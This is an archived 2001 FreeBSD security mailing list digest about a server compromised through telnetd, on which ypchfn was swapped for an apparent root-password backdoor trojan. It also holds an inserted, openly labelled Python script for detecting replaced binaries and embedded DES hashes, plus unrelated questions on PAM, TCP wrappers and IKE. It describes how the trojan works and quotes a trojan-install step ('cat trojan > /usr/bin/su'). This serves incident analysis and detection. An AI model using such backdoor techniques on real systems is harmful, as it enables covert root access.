kzaraska@lhotse.zaraska.dhs.org To: Peter Pentchev Cc: Jon Loeliger , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-Reply-To: <20010724205228.A16243@ringworld.oblivion.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List 
Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001, Peter Pentchev wrote:
> > Here is a `strings /usr/bin/ypchfn`:
> >
> > www 182 # strings /usr/bin/ypchfn
> > /usr/libexec/ld-elf.so.1
> > FreeBSD
> > libcrypt.so.2
> > _DYNAMIC
> > _init
> > __deregister_frame_info
> > crypt
> > strcmp
> > _fini
> > _GLOBAL_OFFSET_TABLE_
> > __register_frame_info
> > libc.so.4
> > strerror
> > execl
> > environ
> > fprintf
> > __progname
> > __error
> > setgid
> > __sF
> > execv
> > getpwuid
> > getpwnam
> > atexit
> > exit
> > strchr
> > execvp
> > setuid
> > _etext
> > _edata
> > __bss_start
> > _end
> > 8/u
> > QR2cc.wsLFbKU
> > root
>
> ..and just as somebody else pointed out, the last two lines look like
> a 13-character DES-encrypted password hash and a username. I think
> that the 'new' ypchfn either replaces root's password, or asks for
> a password and gives a root shell if the user enters the password
> corresponding to that hash. Please correct me if I'm wrong, but...

Driven by curiosity I've just done strings /usr/bin/ypchfn on my 4.3-RELEASE machine and got the output which is 346 lines long. So it seems to me that this binary is not a 'trojaned' ypchfn (that is, a ypchfn with extra feature(s) giving root access) but rather a totally new program, rather short, whose executable has been somehow "padded" to have the length equal to that of the original ypchfn. Two things seem weird to me here: 1. If it _replaces_ root password, how would the future usage of it by the intruder go undetected? Backdoors should be possibly untraceable I guess. 2. What if ypchfn is run by an unsuspecting user in a good will attempt to change her finger information? She locks out root? 
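The two checks in this thread, done by hand above, mechanised as an added example (my code, not anything posted to the list). The first part parses two /etc/security-style setuid listings (the before/after halves of Jon's quoted diff, re-typed here as constructed input) and reports the signature Peter describes: a path whose inode changed while size, mode and mtime stayed identical, plus the hard-link group that lost a member. The second part applies the `strings` heuristic Peter used for a 13-character traditional DES crypt(3) hash to a constructed byte blob built from the strings listing quoted above. The hash-alphabet regex, the mixed-case filter and the sample blob are my assumptions, not something the thread states.

```python
import re
from collections import defaultdict

# Constructed input: the before/after halves of the setuid diff quoted above.
BEFORE = """\
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
"""
AFTER = """\
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
"""

# One listing line: inode mode nlink owner group size mtime path
LINE_RE = re.compile(
    r"^(?P<inode>\d+)\s+(?P<mode>\S+)\s+(?P<nlink>\d+)\s+(?P<owner>\S+)\s+"
    r"(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>[A-Za-z]{3} \d{1,2} \d\d:\d\d:\d\d \d{4})\s+(?P<path>\S+)$"
)


def parse_listing(text):
    """Return {path: fields} for one setuid listing; unparseable lines are skipped."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            for key in ("inode", "nlink", "size"):
                d[key] = int(d[key])
            entries[d["path"]] = d
    return entries


def find_replaced_binaries(before_text, after_text):
    """Return (replaced, link_drops).

    replaced:   paths whose inode changed while size, mode and mtime did not,
                i.e. the file was unlinked and re-created to look untouched.
    link_drops: {old_inode: [paths that left that hard-link group]}, the side
                effect on chfn/chpass/chsh that Peter points out.
    """
    before, after = parse_listing(before_text), parse_listing(after_text)
    replaced = sorted(
        p for p, new in after.items()
        if p in before
        and new["inode"] != before[p]["inode"]
        and (new["size"], new["mode"], new["mtime"])
        == (before[p]["size"], before[p]["mode"], before[p]["mtime"])
    )
    groups = defaultdict(set)
    for d in before.values():
        groups[d["inode"]].add(d["path"])
    link_drops = {}
    for inode, paths in groups.items():
        gone = sorted(p for p in paths if after.get(p, {}).get("inode") != inode)
        if gone and len(gone) < len(paths):
            link_drops[inode] = gone
    return replaced, link_drops


# Constructed blob standing in for the binary: NUL-separated strings taken from
# the `strings /usr/bin/ypchfn` output quoted above, wrapped in junk bytes.
SAMPLE_BLOB = b"\x7fELF\x01\x01\x01" + b"\x00".join([
    b"/usr/libexec/ld-elf.so.1", b"FreeBSD", b"libcrypt.so.2", b"_DYNAMIC",
    b"crypt", b"strcmp", b"libc.so.4", b"getpwnam", b"setuid", b"execvp",
    b"8/u", b"QR2cc.wsLFbKU", b"root",
]) + b"\x00" * 32

# Exactly 13 characters from the crypt(3) output alphabet, standing alone:
# 2 salt characters + 11 hash characters of a traditional DES hash.
DES_TOKEN_RE = re.compile(rb"(?<![./0-9A-Za-z])[./0-9A-Za-z]{13}(?![./0-9A-Za-z])")


def printable_strings(blob, min_len=4):
    """Roughly what strings(1) prints: runs of printable ASCII of at least min_len."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_des_tokens(blob):
    """Every 13-character token in the hash alphabet (loose: filenames match too)."""
    return [m.group().decode() for m in DES_TOKEN_RE.finditer(blob)]


def likely_des_hashes(blob):
    """Keep tokens that mix upper, lower and digit/punctuation, as a random
    hash almost always does and a name like libcrypt.so.2 does not."""
    return [
        t for t in find_des_tokens(blob)
        if re.search(r"[A-Z]", t) and re.search(r"[a-z]", t) and re.search(r"[./0-9]", t)
    ]


if __name__ == "__main__":
    replaced, drops = find_replaced_binaries(BEFORE, AFTER)
    print("replaced in place:", replaced)                 # ['/usr/bin/ypchfn']
    print("hard-link groups that lost members:", drops)   # {8047: ['/usr/bin/ypchfn']}
    print("candidate DES tokens:", find_des_tokens(SAMPLE_BLOB))
    print("likely DES hashes:", likely_des_hashes(SAMPLE_BLOB))
```

Note what each check can and cannot see. The listing comparison catches a file that was unlinked and re-created even when size, mode and timestamps were copied back, because the inode and the siblings' link counts cannot be forged that way; it does not catch the `cat trojan > /usr/bin/su` case Ben raised, where the inode is reused and only the content changes, which needs a content digest (mtree with a digest keyword, or tripwire from read-only media as Dean suggests). The 13-character token scan is a heuristic: on the constructed blob it also fires on `libcrypt.so.2`, which is why the mixed-case filter is applied before treating a token as an embedded hash.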
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:59:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 0F77137B406 for ; Tue, 24 Jul 2001 16:59:15 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by wrath.cs.utah.edu (8.11.1/8.11.1) with ESMTP id f6ONxAX18969; Tue, 24 Jul 2001 17:59:10 -0600 (MDT) From: David G Andersen Received: (from danderse@localhost) by faith.cs.utah.edu (8.11.1/8.11.1) id f6ONx9U09628; Tue, 24 Jul 2001 17:59:09 -0600 (MDT) Message-Id: <200107242359.f6ONx9U09628@faith.cs.utah.edu> Subject: Re: Security Check Diffs Question To: kzaraska@student.uci.agh.edu.pl (Krzysztof Zaraska) Date: Tue, 24 Jul 2001 17:59:09 -0600 (MDT) Cc: roam@orbitel.bg (Peter Pentchev), jdl@jdl.com (Jon Loeliger), security@FreeBSD.ORG In-Reply-To: from "Krzysztof Zaraska" at Jul 25, 2001 01:47:25 AM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lo and behold, Krzysztof Zaraska once said: > > Driven by curiousity I've just done strings /usr/bin/ypchfn on my > 4.3-RELEASE machine and got the output which is 346 lines long. So it > seems to me that this binary is not a 'trojaned' ypchfn (that is, a ypchfn > with extra feature(s) giving root access) but rather a totally new > program, rather short, which executable has been somehow "padded" to have > the length equal to that of the original ypchfn. Two things seem weird to > me here: > > 1. 
If it _replaces_ root password, how would the future usage of it by the > intruder go undetected? Backdoors should be possibly untraceable I guess. It's probably not what you think. > 2. What if ypchfn is run by an unsuspecting user in a good will attempt to > change her finger information? She locks out root? ypchfn is not used to change root's password, especially since almost nobody uses YP for disting out root's password (hint: this would be exceptionally stupid). It's probably a simple trojan with a pretty interface on it that says, (if username == "root", ask for their password. If crypt(input) == that stored password, grant access to the system). If it's clever, it'd shell out to the real ypchfn if that failed. Kind of like a trojaned login binary. A teensy bit of gdb'ing could probably determine if this is correct or not. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 17: 0:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 1A2B437B40F; Tue, 24 Jul 2001 17:00:00 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 733FA66E04; Tue, 24 Jul 2001 16:59:58 -0700 (PDT) Date: Tue, 24 Jul 2001 16:59:58 -0700 From: Kris Kennaway To: Simon Gibson Cc: "'security-officer@FreeBSD.org'" , security@FreeBSD.org Subject: SA-01:49 patches/packages (Re: ftp.freebsd.org) Message-ID: <20010724165957.A38506@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ZPt4rx8FFjLCG7dd" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from simon@spinner.com on Tue, Jul 
24, 2001 at 04:19:17PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --ZPt4rx8FFjLCG7dd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 04:19:17PM -0700, Simon Gibson wrote: > On 7/24/01 @ 16:00 PST I see ftp.freebsd.org looks up as > > Name: ftp.beastie.tdk.net > Address: 62.243.72.50 > Aliases: ftp.freebsd.org > > I would like to obtain the FreeBSD-SA-01:49.telnetd.asc patch. > I have not been able to get it from mirrors. > > Please confirm ftp.beastie.tdk.net is your official site. Yes, but annoyingly it seems to have been down most of the day. I'll put up copies of the patches and packages at http://www.freebsd.org/~kris/SA-01:49/ in a few minutes until we can figure out what happened to the site. Kris --ZPt4rx8FFjLCG7dd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xgv8Wry0BWjoQKURAthAAKDTjm7yl1N8Bw/r307NvCAkwOMdggCeKbRf UwF2rAKXLJ++/KdX/wODot4= =p6hb -----END PGP SIGNATURE----- --ZPt4rx8FFjLCG7dd-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 17:10:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id ACC2937B401; Tue, 24 Jul 2001 17:10:09 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id D6A316722A; Tue, 24 Jul 2001 17:10:08 -0700 (PDT) Date: Tue, 24 Jul 2001 17:10:07 -0700 From: Kris Kennaway To: Kris Kennaway Cc: Simon Gibson , "'security-officer@FreeBSD.org'" , 
security@FreeBSD.org Subject: Re: SA-01:49 patches/packages (Re: ftp.freebsd.org) Message-ID: <20010724171007.A38725@xor.obsecurity.org> References: <20010724165957.A38506@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="GvXjxJ+pjyke8COw" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724165957.A38506@xor.obsecurity.org>; from kris@obsecurity.org on Tue, Jul 24, 2001 at 04:59:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --GvXjxJ+pjyke8COw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 04:59:58PM -0700, Kris Kennaway wrote: > On Tue, Jul 24, 2001 at 04:19:17PM -0700, Simon Gibson wrote: > > On 7/24/01 @ 16:00 PST I see ftp.freebsd.org looks up as > > > > Name: ftp.beastie.tdk.net > > Address: 62.243.72.50 > > Aliases: ftp.freebsd.org > > > > I would like to obtain the FreeBSD-SA-01:49.telnetd.asc patch. > > I have not been able to get it from mirrors. > > > > Please confirm ftp.beastie.tdk.net is your official site. > > Yes, but annoyingly it seems to have been down most of the day. I'll > put up copies of the patches and packages at > > http://www.freebsd.org/~kris/SA-01:49/ > > in a few minutes until we can figure out what happened to the site. Actually, you can just use an ftp mirror site (ftp2, ftp3, etc). Most of them seem to have the bits. 
Kris --GvXjxJ+pjyke8COw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xg5fWry0BWjoQKURAgESAJ9ywWZEdi6uXFzvAYB2Gjyyo+9wVgCaA7CX oUIcC6nfW+hzdUuF14HTL6w= =JsO4 -----END PGP SIGNATURE----- --GvXjxJ+pjyke8COw-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 17:33:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id 66E6637B401 for ; Tue, 24 Jul 2001 17:33:23 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id TAA07176; Tue, 24 Jul 2001 19:38:10 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107250038.TAA07176@chrome.jdl.com> To: Kris Kennaway Cc: Peter Pentchev , security@freebsd.org Subject: Re: Security Check Diffs Question In-reply-to: Your message of "Tue, 24 Jul 2001 15:47:11 PDT." <20010724154711.B36368@xor.obsecurity.org> Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Tue, 24 Jul 2001 19:38:10 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, like Kris Kennaway was saying to me just the other day: > > > ypchfn changed its inode number, and its link count. 
This means that
> > somebody performed an unlink() (delete) on ypchfn, and then created
> > a new ypchfn with the same size, timestamp, permissions and stuff,
> > but still a new file - and that's where the hardlink count + inum
> > tracking of /etc/security kicked in and alerted you.
>
> This is a signature I've seen before; chances are someone has gained
> root on your machine (probably through telnetd)

Excellent. So given the grim situation, this is what I want to hear. The system was compromised. My suspicion is that telnetd was the culprit, given it came on the heels of the telnet Security announcement. No, I hadn't fixed it yet. Man, there just isn't enough time in the day to do your real job _and_ plug the security holes! :-( So the machine is currently off the air. I'll rebuild it. And would that be 4.4 or 4.3? Rats. I'm also going to set up a more serious DMZ firewall. Can I ask you guys questions and hold my hand through setting it all up? I am not familiar with IPFW, but I know what it does, how it works, networking and IP details. So here's what I think I want to set up now:

- External ISP ISDN wire comes out of the wall,
- Hits the Ascend Pipeline-50 and comes out ethernet,
- Goes into a DMZ box on one ether card,
- Same DMZ box has IPFW rules allowing traffic (or not) to be forwarded to the second ether card in that box,
- The second ether card plugs into the 24-port switch,
- Everything else on the "inside" plugs into that same switch.

For starters, do I have the basic scheme right? ( So I'm waiting on the high speed link to come up again, and eventually the Pipe-50 gets replaced with a T-1 LMC card. (Does FreeBSD have an LMC T-1 driver? Or will I have to use this old POS Linux box for that?) ) You know, this is a pain! But I appreciate your suggestions! 
:-) jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 21: 7:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.siat.ru (ns.siat.ru [195.239.171.34]) by hub.freebsd.org (Postfix) with ESMTP id 5C68337B401 for ; Tue, 24 Jul 2001 21:07:17 -0700 (PDT) (envelope-from slava@siat.ru) Received: from siat.ru (slava.siat.ru [195.239.171.36]) by ns.siat.ru (8.11.3/8.11.3) with ESMTP id f6P475420676; Wed, 25 Jul 2001 12:07:05 +0800 (KRSS) Message-ID: <3B5E45F5.22975254@siat.ru> Date: Wed, 25 Jul 2001 12:07:17 +0800 From: "Viacheslav E.Voytovich" Reply-To: slava@siat.ru Organization: Siat Travel X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-6.1.1 i586) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: security@FreeBSD.org Subject: Re: SA-01:49 patches/packages (Re: ftp.freebsd.org) References: <20010724165957.A38506@xor.obsecurity.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Tue, Jul 24, 2001 at 04:19:17PM -0700, Simon Gibson wrote: > > On 7/24/01 @ 16:00 PST I see ftp.freebsd.org looks up as > > > > Name: ftp.beastie.tdk.net > > Address: 62.243.72.50 > > Aliases: ftp.freebsd.org > > > > I would like to obtain the FreeBSD-SA-01:49.telnetd.asc patch. > > I have not been able to get it from mirrors. > > > > Please confirm ftp.beastie.tdk.net is your official site. > > Yes, but annoyingly it seems to have been down most of the day. I'll > put up copies of the patches and packages at > > http://www.freebsd.org/~kris/SA-01:49/ > > in a few minutes until we can figure out what happened to the site. 
> > Kris > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature Hello !!! Maybe someone can tell me where I can get the patch for telnet in FreeBSD 2.2.8? In the list I didn't find an answer to this question. Viacheslav Voytovich To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 21:58:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from web10007.mail.yahoo.com (web10007.mail.yahoo.com [216.136.130.43]) by hub.freebsd.org (Postfix) with SMTP id 9D18937B401 for ; Tue, 24 Jul 2001 21:58:45 -0700 (PDT) (envelope-from thiamwah@yahoo.com) Message-ID: <20010725045845.40608.qmail@web10007.mail.yahoo.com> Received: from [161.142.100.81] by web10007.mail.yahoo.com; Tue, 24 Jul 2001 21:58:45 PDT Date: Tue, 24 Jul 2001 21:58:45 -0700 (PDT) From: David Chong Subject: TCP Wrappers and Inetd To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org dear guys, I understand that TCP Wrappers is included when you install FreeBSD and it already provides protection without the need to modify inetd.conf to use "tcpd" for the services you wish to secure. My question is: does it just cover services in inetd (just like tcp wrappers for other unixes) or does it cover more than that in FreeBSD? Like standalone daemons ie. sendmail, httpd, sshd. Thanks __________________________________________________ Do You Yahoo!? Make international calls for as low as $.04/minute with Yahoo! 
Messenger http://phonecard.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 22:18:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from pegasus.cc.ucf.edu (Pegasus.cc.ucf.edu [132.170.240.30]) by hub.freebsd.org (Postfix) with ESMTP id DDA0B37B403 for ; Tue, 24 Jul 2001 22:18:39 -0700 (PDT) (envelope-from ewayte@pegasus.cc.ucf.edu) Received: from pegasus.cc.ucf.edu (pegasus.cc.ucf.edu [132.170.240.30]) Ident [ewayte] by pegasus.cc.ucf.edu (Postfix) with ESMTP id 8ED533785; Wed, 25 Jul 2001 01:18:33 -0400 (EDT) Date: Wed, 25 Jul 2001 01:18:32 -0400 (EDT) From: Eric Wayte To: Cc: Subject: Re: Security Check Diffs Question In-Reply-To: <200107242341.f6ONfpi99078@cdrrdslgw2poolA156.cdrr.uswest.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org An excellent idea! Our sysadmin has done this for all of our Solaris servers (production and development). Eric Wayte University DBA Univ. of Central Florida ewayte@pegasus.cc.ucf.edu On Tue, 24 Jul 2001, Dean M. Phillips wrote: > > For mission-critical servers, I prefer to use tripwire. Burn the binary > and the database onto a CDROM and it will be nearly tamper-proof. 
> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 23:37:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 4448C37B406 for ; Tue, 24 Jul 2001 23:37:01 -0700 (PDT) (envelope-from kzaraska@student.uci.agh.edu.pl) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id 973D41C67; Wed, 25 Jul 2001 08:36:32 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 41F335475; Wed, 25 Jul 2001 08:36:32 +0200 (CEST) Date: Wed, 25 Jul 2001 08:36:31 +0200 (CEST) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: David G Andersen Cc: Peter Pentchev , Jon Loeliger , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-Reply-To: <200107242359.f6ONx9U09628@faith.cs.utah.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001, David G Andersen wrote: > It's probably a simple trojan with a pretty interface on it that > says, (if username == "root", ask for their password. If crypt(input) == > that stored password, grant access to the system). I agree that this is the way this thing should work, but I was wondering: I ran strings on the original ypchfn and I see a bunch of lines like "no uid for %s" resembling arguments for printf(), so I guess that is ypchfn's user interface. But in this trojan I can see neither these lines nor anything resembling a path to the original ypchfn. So, my question is: how does it masquerade to the user as the original ypchfn without having its user interface inside? 
Or, maybe, the trojan contains ypchfn-like user interface but it cannot be seen with by running strings on it? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 1:20: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 9BEA337B401 for ; Wed, 25 Jul 2001 01:20:01 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id f6P8Jt715529 for security@freebsd.org; Wed, 25 Jul 2001 04:19:55 -0400 (EDT) (envelope-from str) Date: Wed, 25 Jul 2001 04:19:55 -0400 (EDT) From: Igor Roshchin Message-Id: <200107250819.f6P8Jt715529@giganda.komkon.org> To: security@freebsd.org Subject: sshd, pam and password expiration Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I ran into the following problem: FreeBSD 4.3-RELEASE box. If a user has the password expired (non-zero corresponding field in /etc/master.passwd), then upon login via ssh (using a ssh2 client) the following happens: depending on the client: Unix ssh2 client: (e.g. SSH Secure Shell 2.3.0 (non-commercial version)) Upon login, the following message appears: Authentication successful. 
Warning: Your password has expired, please change it now And then the connection freezes up, while the log is filled with thousands per second messages: Jul 25 04:03:51 HOST sshd[15221]: PAM pam_chauthtok failed[6]: Permission denied Jul 25 04:03:51 HOST giganda sshd[15221]: no modules loaded for `sshd' service /etc/pam.conf has the following lines relevant to ssh: sshd auth sufficient pam_skey.so sshd auth required pam_unix.so try_first_pass sshd session required pam_permit.so csshd auth required pam_skey.so If a Windows-based ssh.com's ssh is used the user gets the message: Server responded "No further authentication methods available". and nothing else happens. There are no problems if the connection is via ssh1 client, or if the password is not expired. Questions: 1. What is the reason and what is misconfigured ? 2. Where can I read a nice description of pam authentication ? Thanks, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 3: 0:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13308.mail.yahoo.com (web13308.mail.yahoo.com [216.136.175.44]) by hub.freebsd.org (Postfix) with SMTP id 03FF137B401 for ; Wed, 25 Jul 2001 03:00:14 -0700 (PDT) (envelope-from ewancarr@yahoo.com) Message-ID: <20010725100013.15001.qmail@web13308.mail.yahoo.com> Received: from [158.234.10.144] by web13308.mail.yahoo.com; Wed, 25 Jul 2001 11:00:13 BST Date: Wed, 25 Jul 2001 11:00:13 +0100 (BST) From: =?iso-8859-1?q?Ewan=20Carr?= Subject: IKE/Racoon To: FreeBSD-Security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Can anyone clear up an ambiguity (in my mind anyway) in RFC2409 (IKE). 
Say you are using a pre-shared key for authentication in Phase 1 negotiations. RFC 2409 says that the SKEYID value for authentication is calculated thus.. For signatures: SKEYID = prf(Ni_b | Nr_b, g^xy) ..... For pre-shared: SKEYID = prf(pre-shared, Ni_b | Nr_b) where g^xy is the DH-generated shared key. and N* are the nonce values The value SKEYID_A is then calculated from prf(SKEYID,SKEYID_d | g^xy | CKY-I | CKY-R | 1) (SKEYID_d is just anothe generated from SKEYID, the cookies and the diffe-hellman shared secret) What I dont understand is why for the pre-shared key method of authentication you need to generate this additional diffe hellman shared key. Does this actually happen or is the 'formula' above just confusing.. Ta, Ewan ____________________________________________________________ Do You Yahoo!? Get your free @yahoo.co.uk address at http://mail.yahoo.co.uk or your free @yahoo.ie address at http://mail.yahoo.ie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 3:12:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 594CE37B405 for ; Wed, 25 Jul 2001 03:12:46 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.31 #1) id 15PLfe-000PDR-00; Wed, 25 Jul 2001 12:13:38 +0200 From: Sheldon Hearn To: David Chong Cc: freebsd-security@FreeBSD.ORG Subject: Re: TCP Wrappers and Inetd In-reply-to: Your message of "Tue, 24 Jul 2001 21:58:45 MST." 
